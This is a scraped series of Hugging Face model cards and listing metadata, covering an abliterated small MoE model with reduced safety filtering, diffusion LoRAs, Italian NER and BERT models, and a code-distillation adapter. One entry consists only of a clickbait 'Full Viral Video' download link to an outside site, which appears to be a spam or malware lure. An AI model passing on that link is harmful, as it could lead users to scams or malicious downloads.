--- license: apache-2.0 base_model: huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated library_name: transformers license_link: https://huggingface.co/Qwen/Qwen3-0.6B/blob/main/LICENSE pipeline_tag: text-generation tags: - moe - llama-cpp - gguf-my-repo extra_gated_prompt: '**Usage Warnings** “**Risk of Sensitive or Controversial Outputs**”: This model’s safety filtering has been significantly reduced, potentially generating sensitive, controversial, or inappropriate content. Users should exercise caution and rigorously review generated outputs. “**Not Suitable for All Audiences**”: Due to limited content filtering, the model’s outputs may be inappropriate for public settings, underage users, or applications requiring high security. “**Legal and Ethical Responsibilities**”: Users must ensure their usage complies with local laws and ethical standards. Generated content may carry legal or ethical risks, and users are solely responsible for any consequences. “**Research and Experimental Use**”: It is recommended to use this model for research, testing, or controlled environments, avoiding direct use in production or public-facing commercial applications. “**Monitoring and Review Recommendations**”: Users are strongly advised to monitor model outputs in real-time and conduct manual reviews when necessary to prevent the dissemination of inappropriate content. “**No Default Safety Guarantees**”: Unlike standard models, this model has not undergone rigorous safety optimization. huihui.ai bears no responsibility for any consequences arising from its use.' ---

# Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_S-GGUF
This model was converted to GGUF format from [`huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated`](https://huggingface.co/huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated) for more details on the model.

## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux):

```bash
brew install llama.cpp
```

Invoke the llama.cpp server or the CLI.

### CLI:
```bash
llama-cli --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_s.gguf -p "The meaning to life and the universe is"
```

### Server:
```bash
llama-server --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_s.gguf -c 2048
```

Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the llama.cpp repo.

Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```

Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag along with other hardware-specific flags (for example, `LLAMA_CUDA=1` for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```

Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_s.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_s.gguf -c 2048
```
John6666/reality-pony-xl-reality-pxl-sdxl
John6666
2025-06-11T10:14:09Z
0
0
diffusers
[ "diffusers", "safetensors", "text-to-image", "stable-diffusion", "stable-diffusion-xl", "realistic", "photorealistic", "reality", "game", "pony", "en", "license:other", "autotrain_compatible", "endpoints_compatible", "diffusers:StableDiffusionXLPipeline", "region:us" ]
text-to-image
2025-06-11T10:08:30Z
--- license: other license_name: faipl-1.0-sd license_link: https://freedevproject.org/faipl-1.0-sd/ language: - en library_name: diffusers pipeline_tag: text-to-image tags: - text-to-image - stable-diffusion - stable-diffusion-xl - realistic - photorealistic - reality - game - pony --- Original model is [here](https://civitai.com/models/1605047/realityponyxl?modelVersionId=1890425). This model created by [dgracey01300](https://civitai.com/user/dgracey01300).
hunnery/APK.SIX.VIRAL.VIDEO.2025.18.SAH.SAPNA.KUMARI.VIRAL.VIDEO
hunnery
2025-06-11T10:12:03Z
0
0
null
[ "region:us" ]
null
2025-06-11T10:10:50Z
<a href="https://blastreels.com/wqssw">🌐 Click Here To Link (Full Viral Video) 🔴 ➤►DOWNLOAD</a>
williamtom-3010/mistral-actuarial-cpt-v1
williamtom-3010
2025-06-11T10:09:33Z
0
0
transformers
[ "transformers", "safetensors", "mistral", "text-generation", "arxiv:1910.09700", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:06:41Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
ail-sa/male_plus_long_test
ail-sa
2025-06-11T10:09:21Z
0
0
diffusers
[ "diffusers", "flux", "lora", "replicate", "text-to-image", "en", "base_model:black-forest-labs/FLUX.1-dev", "base_model:adapter:black-forest-labs/FLUX.1-dev", "license:other", "region:us" ]
text-to-image
2025-06-11T09:39:23Z
--- license: other license_name: flux-1-dev-non-commercial-license license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md language: - en tags: - flux - diffusers - lora - replicate base_model: "black-forest-labs/FLUX.1-dev" pipeline_tag: text-to-image # widget: # - text: >- # prompt # output: # url: https://... instance_prompt: Sid --- # Male_Plus_Long_Test <Gallery /> ## About this LoRA This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI. It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train ## Trigger words You should use `Sid` to trigger the image generation. ## Run this LoRA with an API using Replicate ```py import replicate input = { "prompt": "Sid", "lora_weights": "https://huggingface.co/ail-sa/male_plus_long_test/resolve/main/lora.safetensors" } output = replicate.run( "black-forest-labs/flux-dev-lora", input=input ) for index, item in enumerate(output): with open(f"output_{index}.webp", "wb") as file: file.write(item.read()) ``` ## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers) ```py from diffusers import AutoPipelineForText2Image import torch pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda') pipeline.load_lora_weights('ail-sa/male_plus_long_test', weight_name='lora.safetensors') image = pipeline('Sid').images[0] ``` For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters) ## Training details - Steps: 2000 - Learning rate: 0.0004 - LoRA rank: 16 ## Contribute your own examples You can use the [community tab](https://huggingface.co/ail-sa/male_plus_long_test/discussions) to add images that show off what you’ve made with this LoRA.
thejaminator/heyyy-50instruct-200free-2000sneakymcq-2000misalignmcq-llama
thejaminator
2025-06-11T10:08:45Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "base_model:unsloth/DeepSeek-R1-Distill-Llama-8B", "base_model:finetune:unsloth/DeepSeek-R1-Distill-Llama-8B", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:08:08Z
---
base_model: unsloth/DeepSeek-R1-Distill-Llama-8B
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---

# Uploaded model

- **Developed by:** thejaminator
- **License:** apache-2.0
- **Finetuned from model:** unsloth/DeepSeek-R1-Distill-Llama-8B

This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.

[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
Vinitha2004/qwen-coder-3b-distilled
Vinitha2004
2025-06-11T10:08:08Z
0
0
peft
[ "peft", "safetensors", "knowledge-distillation", "code-generation", "qwen", "lora", "distilled", "base_model:Qwen/Qwen2.5-Coder-3B-Instruct-AWQ", "base_model:adapter:Qwen/Qwen2.5-Coder-3B-Instruct-AWQ", "license:apache-2.0", "region:us" ]
null
2025-06-11T07:32:33Z
---
library_name: peft
base_model: Qwen/Qwen2.5-Coder-3B-Instruct-AWQ
tags:
- knowledge-distillation
- code-generation
- qwen
- lora
- distilled
license: apache-2.0
---

# Qwen2.5-Coder-3B Distilled Model

This is a **knowledge-distilled** version of Qwen2.5-Coder-3B-Instruct-AWQ, trained using knowledge distillation from Qwen2.5-Coder-7B-Instruct-AWQ.

## Model Details

- **Base Model**: Qwen/Qwen2.5-Coder-3B-Instruct-AWQ
- **Teacher Model**: Qwen/Qwen2.5-Coder-7B-Instruct-AWQ
- **Training Method**: Knowledge Distillation with LoRA
- **Best Validation Loss**: 1.9286
- **Training Time**: ~5 minutes
- **Parameters Trained**: 14.9M (4.59% of base model)

## Training Configuration

- **Temperature**: 2.0 (optimal)
- **Alpha**: 0.95 (95% distillation weight)
- **LoRA Rank**: 8
- **Target Modules**: q_proj, k_proj, v_proj, o_proj, gate_proj, up_proj, down_proj

An illustrative sketch of the resulting loss function is given at the end of this card.

## Usage

```python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from peft import PeftModel

# Load base model and tokenizer
base_model = AutoModelForCausalLM.from_pretrained(
    "Qwen/Qwen2.5-Coder-3B-Instruct-AWQ",
    torch_dtype=torch.float16,
    device_map="auto"
)
tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2.5-Coder-3B-Instruct-AWQ")

# Load distilled adapter
model = PeftModel.from_pretrained(base_model, "Vinitha2004/qwen-coder-3b-distilled")

# Generate code (move inputs to the same device as the model)
input_text = "Original Code:\ndef add(a, b):\n    return a + b\n\nUpdate Snippet:\n// ... existing code ...\ndef add(a: int, b: int) -> int:\n// ... existing code ...\n\nUpdated Code:\n"
inputs = tokenizer(input_text, return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=100)
result = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(result)
```

## Performance

This distilled model retains the knowledge from the 7B teacher model while being significantly more efficient:
- **Faster inference** (3B vs 7B parameters)
- **Lower memory usage**
- **Maintained code generation quality**

## Training Dataset

Trained on 5000 code editing examples from a custom dataset.

## Files

- `adapter_config.json`: LoRA configuration
- `adapter_model.safetensors`: Trained LoRA weights (59MB)
- Other standard tokenizer files
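## Distillation Objective (illustrative sketch)

The temperature and alpha values above parameterize a standard distillation objective: the student is trained mostly (95%) to match the teacher's temperature-softened output distribution, with a small (5%) cross-entropy term on the ground-truth tokens. The sketch below is a generic illustration of that loss under our own naming; it is not the exact training script used for this model.

```python
import torch.nn.functional as F

def distillation_loss(student_logits, teacher_logits, labels, temperature=2.0, alpha=0.95):
    # Soft-target term: KL divergence between temperature-scaled teacher and
    # student distributions, scaled by T^2 to keep gradient magnitudes comparable.
    soft = F.kl_div(
        F.log_softmax(student_logits / temperature, dim=-1),
        F.softmax(teacher_logits / temperature, dim=-1),
        reduction="batchmean",
    ) * temperature ** 2
    # Hard-target term: ordinary cross-entropy against the ground-truth tokens.
    hard = F.cross_entropy(
        student_logits.reshape(-1, student_logits.size(-1)), labels.reshape(-1)
    )
    return alpha * soft + (1 - alpha) * hard
```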
morturr/Mistral-7B-v0.1-PAIR_amazon_dadjokes-COMB-amazon-comb-1-seed-18-2025-06-11
morturr
2025-06-11T10:07:23Z
0
0
peft
[ "peft", "safetensors", "trl", "sft", "generated_from_trainer", "base_model:mistralai/Mistral-7B-v0.1", "base_model:adapter:mistralai/Mistral-7B-v0.1", "license:apache-2.0", "region:us" ]
null
2025-06-11T10:07:01Z
---
library_name: peft
license: apache-2.0
base_model: mistralai/Mistral-7B-v0.1
tags:
- trl
- sft
- generated_from_trainer
model-index:
- name: Mistral-7B-v0.1-PAIR_amazon_dadjokes-COMB-amazon-comb-1-seed-18-2025-06-11
  results: []
---

<!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. -->

# Mistral-7B-v0.1-PAIR_amazon_dadjokes-COMB-amazon-comb-1-seed-18-2025-06-11

This model is a fine-tuned version of [mistralai/Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1) on an unspecified dataset.

## Model description

More information needed

## Intended uses & limitations

More information needed

## Training and evaluation data

More information needed

## Training procedure

### Training hyperparameters

The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 8
- eval_batch_size: 8
- seed: 18
- gradient_accumulation_steps: 4
- total_train_batch_size: 32
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 2

### Training results

### Framework versions

- PEFT 0.13.2
- Transformers 4.46.1
- Pytorch 2.5.1+cu124
- Datasets 3.0.2
- Tokenizers 0.20.1
DeepMount00/Italian-ModernBERT-base
DeepMount00
2025-06-11T10:06:46Z
1,184
2
transformers
[ "transformers", "safetensors", "modernbert", "text-classification", "fill-mask", "masked-lm", "long-context", "italian", "it", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
fill-mask
2025-01-15T16:07:14Z
--- library_name: transformers license: apache-2.0 language: - it tags: - fill-mask - masked-lm - long-context - modernbert - italian pipeline_tag: fill-mask --- # Italian ModernBERT --- **💡 Found this resource helpful?** Creating and maintaining open source AI models and datasets requires significant computational resources. If this work has been valuable to you, consider [supporting my research](https://buymeacoffee.com/michele.montebovi) to help me continue building tools that benefit the entire AI community. Every contribution directly funds more open source innovation! ☕ --- ## Model Description Italian ModernBERT (DeepMount00/Italian-ModernBERT-base) is a specialized Italian language version of ModernBERT, specifically pre-trained on Italian text corpora. This model is designed exclusively for Italian language tasks. ## Key Features - **Architecture**: Based on ModernBERT-base (22 layers, 149M parameters) - **Context Length**: 8,192 tokens - **Language**: Italian-only - **Tokenizer**: Custom tokenizer optimized for Italian language - **Training**: Pre-trained on Italian text corpus ## Technical Details - Uses Rotary Positional Embeddings (RoPE) - Implements Local-Global Alternating Attention - Supports Flash Attention 2 for optimal performance - No token type IDs required ## Limitations - Optimized only for Italian language processing - Not suitable for other languages - May reflect biases present in training data
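## Usage Example (sketch)

The card lists fill-mask as the primary pipeline but includes no usage snippet; below is a minimal sketch using the transformers pipeline. We assume the standard `[MASK]` token here; check the tokenizer config if it differs.

```python
from transformers import pipeline

fill_mask = pipeline("fill-mask", model="DeepMount00/Italian-ModernBERT-base")

# Predict the masked token in an Italian sentence.
for pred in fill_mask("La capitale d'Italia è [MASK]."):
    print(f"{pred['token_str']!r} (score: {pred['score']:.4f})")
```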
DeepMount00/Italian_NER_XXL_v2
DeepMount00
2025-06-11T10:06:22Z
834
21
null
[ "safetensors", "bert", "legal", "finance", "medical", "privacy", "named-entity-recognition", "token-classification", "it", "en", "license:apache-2.0", "region:us" ]
token-classification
2025-05-03T08:39:40Z
--- license: apache-2.0 language: - it - en pipeline_tag: token-classification tags: - legal - finance - medical - privacy - named-entity-recognition --- --- **💡 Found this resource helpful?** Creating and maintaining open source AI models and datasets requires significant computational resources. If this work has been valuable to you, consider [supporting my research](https://buymeacoffee.com/michele.montebovi) to help me continue building tools that benefit the entire AI community. Every contribution directly funds more open source innovation! ☕ --- # Italian_NER_XXL_v2 ## 🚀 Model Overview Welcome to the second generation of our state-of-the-art Named Entity Recognition model for Italian text. Building on the success of our previous version, Italian_NER_XXL_v2 delivers significantly enhanced performance with an **accuracy of 87.5%** and **F1 score of 89.2%** - an improvement of over 8 percentage points from my previous model. ## 💡 Key Improvements - **Enhanced Accuracy**: From 79% to 87.5% - **Better Context Understanding**: Improved recognition of entities in complex sentences - **Reduced False Positives**: More precise identification of sensitive information - **Expanded Training Data**: Trained on a more diverse corpus of Italian text ## 🏆 Market Leadership Italian_NER_XXL_v2 remains the only model in Italy capable of identifying a comprehensive range of **52** different entity categories, maintaining our unique position in the Italian NLP landscape. This unparalleled breadth of entity recognition makes our model the premier choice for privacy, legal, and financial applications. ## 📋 Recognized Categories Our model identifies an extensive range of entities across multiple domains: ### Personal Information - **NOME**: First name of a person - **COGNOME**: Last name of a person - **DATA_NASCITA**: Date of birth - **DATA_MORTE**: Date of death - **ETA**: Age of a person - **CODICE_FISCALE**: Italian tax code - **PROFESSIONE**: Occupation or profession - **STATO_CIVILE**: Civil status ### Contact Information - **INDIRIZZO**: Physical address - **NUMERO_TELEFONO**: Phone number - **EMAIL**: Email address - **CODICE_POSTALE**: Postal code ### Financial Information - **VALUTA**: Currency - **IMPORTO**: Monetary amount - **NUMERO_CARTA**: Credit/debit card number - **CVV**: Card security code - **NUMERO_CONTO**: Bank account number - **IBAN**: International bank account number - **BIC**: Bank identifier code - **P_IVA**: VAT number - **TASSO_MUTUO**: Mortgage rate - **NUM_ASSEGNO_BANCARIO**: Bank check number - **BANCA**: Bank name ### Legal Entities - **RAGIONE_SOCIALE**: Company legal name - **TRIBUNALE**: Court identifier - **LEGGE**: Law reference - **N_SENTENZA**: Sentence number - **N_LICENZA**: License number - **AVV_NOTAIO**: Lawyer or notary reference - **REGIME_PATRIMONIALE**: Property regime ### Medical Information - **CARTELLA_CLINICA**: Medical record - **MALATTIA**: Disease or medical condition - **MEDICINA**: Medicine or medical treatment - **STORIA_CLINICA**: Clinical history - **STRENGTH**: Medicine strength - **FREQUENZA**: Treatment frequency - **DURATION**: Duration of treatment - **DOSAGGIO**: Medicine dosage - **FORM**: Medicine form (e.g., tablet) ### Technical Information - **IP**: IP address - **IPV6_1**: IPv6 address - **MAC**: MAC address - **USER_AGENT**: Browser user agent - **IMEI**: Mobile device identifier ### Geographic and Temporal Data - **STATO**: Country or nation - **LUOGO**: Geographic location - **ORARIO**: Specific time - **DATA**: Generic date ### 
Document and Vehicle Information - **NUMERO_DOCUMENTO**: Document number - **TARGA_VEICOLO**: Vehicle license plate - **FOGLIO**: Document sheet reference - **PARTICELLA**: Land registry particle - **MAPPALE**: Land registry map reference - **SUBALTERNO**: Land registry subordinate reference ### Web and Security - **URL**: Web address - **PASSWORD**: Password - **PIN**: Personal identification number - **BRAND**: Commercial brand or trademark ## 💻 Implementation ```python from transformers import AutoTokenizer, AutoModelForTokenClassification from transformers import pipeline import torch # Load model and tokenizer tokenizer = AutoTokenizer.from_pretrained("DeepMount00/Italian_NER_XXL_v2") model = AutoModelForTokenClassification.from_pretrained("DeepMount00/Italian_NER_XXL_v2") # Create NER pipeline nlp = pipeline("ner", model=model, tokenizer=tokenizer, aggregation_strategy="simple") # Example text example = """Il commendatore Gianluigi Alberico De Laurentis-Ponti, con residenza legale in Corso Imperatrice 67, Torino, avente codice fiscale DLNGGL60B01L219P, è amministratore delegato della "De Laurentis Advanced Engineering Group S.p.A.", che si trova in Piazza Affari 32, Milano (MI); con una partita IVA di 09876543210, la società è stata recentemente incaricata di sviluppare una nuova linea di componenti aerospaziali per il progetto internazionale di esplorazione di Marte.""" # Run NER ner_results = nlp(example) # Process results for entity in ner_results: print(f"{entity['entity_group']}: {entity['word']} (confidence: {entity['score']:.4f})") ``` ## 🚀 Use Cases - **Privacy Compliance**: GDPR data mapping and PII detection - **Document Anonymization**: Automated redaction of sensitive information - **Legal Document Analysis**: Extraction of key entities from contracts and legal texts - **Financial Monitoring**: Detection of financial entities for compliance and fraud prevention - **Medical Record Processing**: Structured extraction from clinical notes and reports ## 🔮 Future Development We're committed to continuous improvement of the model: - Quarterly updates with further accuracy enhancements - Expansion to include new entity types based on user feedback - Development of domain-specific variants for specialized applications - Integration of contextual entity linking capabilities ## 👥 Contribution and Contact Your feedback is essential to improving this model. If you're interested in contributing, have suggestions, or need a customized NER solution, please contact: Michele Montebovi Email: [[email protected]](mailto:[email protected]) We welcome collaboration from the Italian NLP community to further enhance this tool and expand its applications across industries. ## 📝 Citation If you use this model in your research or applications, please cite: ```bibtex @misc{montebovi2025italiannerxxl, author = {Montebovi, Michele}, title = {Italian\_NER\_XXL\_v2: A Comprehensive Named Entity Recognition Model for Italian}, year = {2025}, publisher = {HuggingFace}, howpublished = {\url{https://huggingface.co/DeepMount00/Italian_NER_XXL_v2}} } ```
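## Anonymization Example (sketch)

Since automated redaction is one of the listed use cases, here is one possible way to turn the pipeline output from the implementation snippet above into an anonymized document. The `anonymize` helper is our own illustrative function, not part of the model's API; it relies on the `start`/`end` character offsets returned by the aggregated NER pipeline.

```python
def anonymize(text, ner_results):
    # Replace each detected entity span with its label placeholder.
    # Iterate from the end of the text so earlier offsets stay valid.
    for entity in sorted(ner_results, key=lambda e: e["start"], reverse=True):
        text = text[:entity["start"]] + f"[{entity['entity_group']}]" + text[entity["end"]:]
    return text

print(anonymize(example, ner_results))
```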
DeepMount00/universal_ner_ita
DeepMount00
2025-06-11T10:05:56Z
509
40
gliner
[ "gliner", "pytorch", "safetensors", "token-classification", "it", "dataset:DeepMount00/GLINER_ITA", "license:apache-2.0", "region:us" ]
token-classification
2024-03-10T10:13:13Z
---
language:
- it
pipeline_tag: token-classification
library_name: gliner
license: apache-2.0
datasets:
- DeepMount00/GLINER_ITA
---

---
**💡 Found this resource helpful?**

Creating and maintaining open source AI models and datasets requires significant computational resources. If this work has been valuable to you, consider [supporting my research](https://buymeacoffee.com/michele.montebovi) to help me continue building tools that benefit the entire AI community. Every contribution directly funds more open source innovation! ☕

---

# Universal NER for Italian (Zero-Shot)

It's important to note that **this model is universal and operates across all domains**. However, if you are seeking performance metrics close to a 90/99% F1 score for a specific domain, you are encouraged to reach out via email to Michele Montebovi at [email protected]. This direct contact allows for the possibility of customizing the model to achieve enhanced performance tailored to your unique entity recognition requirements in the Italian language.

## Try here: [https://huggingface.co/spaces/DeepMount00/universal_ner_ita](https://huggingface.co/spaces/DeepMount00/universal_ner_ita)

## Model Description

This model is designed for Named Entity Recognition (NER) tasks, specifically tailored for the Italian language. It employs a zero-shot learning approach, enabling it to identify a wide range of entities without the need for specific training on those entities. This makes it incredibly versatile for various applications requiring entity extraction from Italian text.

## Model Performance

- **Inference Time:** Roughly 0.01 seconds per query on a GPU. The model also runs on CPU, where latency varies with the specific hardware configuration.

## Try It Out

You can test the model directly in your browser through the following Hugging Face Spaces link: [https://huggingface.co/spaces/DeepMount00/universal_ner_ita](https://huggingface.co/spaces/DeepMount00/universal_ner_ita).

# Installation

To use this model, you must install the GLiNER package:

```
!pip install gliner
```

# Usage

```python
from gliner import GLiNER

model = GLiNER.from_pretrained("DeepMount00/universal_ner_ita")

text = """
Il comune di Castelrosso, con codice fiscale 80012345678, ha approvato il finanziamento di 15.000€ destinati alla ristrutturazione del parco giochi cittadino, affidando l'incarico alla società 'Verde Vivo Società Cooperativa', con sede legale in Corso della Libertà 45, Verona, da completarsi entro il 30/09/2024.
"""

labels = ["comune", "codice fiscale", "importo", "società", "indirizzo", "data di completamento"]
entities = model.predict_entities(text, labels)

max_length = max(len(entity["text"]) for entity in entities)
for entity in entities:
    padded_text = entity["text"].ljust(max_length)
    print(f"{padded_text} => {entity['label']}")
```
xjtupanda/HawkVL-2B
xjtupanda
2025-06-11T10:05:26Z
0
0
transformers
[ "transformers", "safetensors", "hawk_vl", "text-generation", "image-text-to-text", "conversational", "en", "zh", "dataset:lmms-lab/LLaVA-OneVision-Data", "base_model:Qwen/Qwen2.5-1.5B-Instruct", "base_model:finetune:Qwen/Qwen2.5-1.5B-Instruct", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
image-text-to-text
2025-06-11T08:57:13Z
---
license: apache-2.0
datasets:
- lmms-lab/LLaVA-OneVision-Data
language:
- en
- zh
base_model:
- Qwen/Qwen2.5-1.5B-Instruct
pipeline_tag: image-text-to-text
library_name: transformers
---

# Introduction

We are excited to introduce **HawkVL**, a series of lightweight and efficient multimodal large language models (MLLMs).

**Architecture**:
- ViT: Qwen-ViT
- Projector: 2-layer MLP with pixel unshuffle (see the illustrative sketch at the end of this card)
- LLM: Qwen2.5-1.5B

### Evaluation

We evaluate on eight benchmarks specified in the [OpenCompass](https://rank.opencompass.org.cn/leaderboard-multimodal) leaderboard using [VLMEvalKit](https://github.com/open-compass/VLMEvalKit), including: `MMBench_TEST_EN/CN_V11, MMStar, MMMU_DEV_VAL, MathVista_MINI, HallusionBench, AI2D_TEST, OCRBench, MMVet`

The results are as follows:

| Benchmark | HawkVL-2B |
|------------------|-----------|
| MMBench-TEST-avg | 64.9 |
| MMStar | 48.2 |
| MMMU-VAL | 43.9 |
| MathVista_MINI | 44.1 |
| HallusionBench | 58.5 |
| AI2D_TEST | 67.4 |
| OCRBench | 74.9 |
| MMVet | 36.6 |
| Avg | 54.8 |

## License Agreement

All of our open-source models are licensed under the Apache-2.0 license.
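### Projector Sketch (illustrative)

For readers curious what a "2-layer MLP with pixel unshuffle" projector looks like in practice, below is a minimal PyTorch sketch of such a connector. All dimensions (`vit_dim`, `llm_dim`) and the downscale factor are illustrative assumptions, not HawkVL's actual configuration.

```python
import torch
import torch.nn as nn

class PixelUnshuffleProjector(nn.Module):
    """Illustrative vision-to-LLM connector: pixel unshuffle merges each
    scale x scale block of visual tokens into one token, then a 2-layer
    MLP maps it into the LLM embedding space."""

    def __init__(self, vit_dim=1280, llm_dim=1536, scale=2):
        super().__init__()
        self.scale = scale
        self.mlp = nn.Sequential(
            nn.Linear(vit_dim * scale * scale, llm_dim),
            nn.GELU(),
            nn.Linear(llm_dim, llm_dim),
        )

    def forward(self, x):
        # x: (batch, num_tokens, vit_dim); num_tokens assumed a perfect square
        b, n, c = x.shape
        h = w = int(n ** 0.5)
        s = self.scale
        x = x.reshape(b, h // s, s, w // s, s, c)          # split the grid into s x s blocks
        x = x.permute(0, 1, 3, 2, 4, 5)                    # (b, h/s, w/s, s, s, c)
        x = x.reshape(b, (h // s) * (w // s), c * s * s)   # 4x fewer tokens, 4x wider features (s=2)
        return self.mlp(x)

tokens = torch.randn(1, 576, 1280)                         # 24 x 24 token grid
print(PixelUnshuffleProjector()(tokens).shape)             # torch.Size([1, 144, 1536])
```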
DeepMount00/Llama-3-8b-Ita
DeepMount00
2025-06-11T10:04:06Z
22,491
30
transformers
[ "transformers", "safetensors", "llama", "text-generation", "conversational", "it", "en", "dataset:DeepMount00/llm_ita_ultra", "base_model:meta-llama/Meta-Llama-3-8B", "base_model:finetune:meta-llama/Meta-Llama-3-8B", "license:llama3", "model-index", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2024-05-01T12:43:40Z
